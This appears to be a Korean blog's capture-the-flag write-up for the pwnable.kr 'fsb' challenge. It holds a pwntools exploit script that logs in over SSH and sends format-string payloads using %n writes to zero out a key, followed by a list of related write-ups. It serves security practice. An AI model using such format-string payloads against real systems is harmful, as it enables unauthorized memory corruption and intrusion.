너무 쉬운 날먹 문제. key를 0으로 바꿔버리자.
Exploit Code
from pwn import *
#p=process('./fsb')
sh = ssh('fsb', 'pwnable.kr', password='guest', port=2222)
p = sh.process('./fsb')
p.sendlineafter(')\n', '%134520928c%14$nAAAA%15$n')
p.sendlineafter(')\n', '%20$n%21$nAAAAAAAAAAAAAAAAAAA')
p.sendlineafter(')\n', 'A'*99)
p.sendlineafter(')\n', 'A'*99)
p.sendlineafter(': \n', '0')
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.kr' 카테고리의 다른 글
| rsa calculator (0) | 2020.03.07 |
|---|---|
| md5 calculator (0) | 2020.03.07 |
| echo2 (0) | 2020.03.07 |
| echo1 (0) | 2020.03.07 |
| dragon (0) | 2020.03.07 |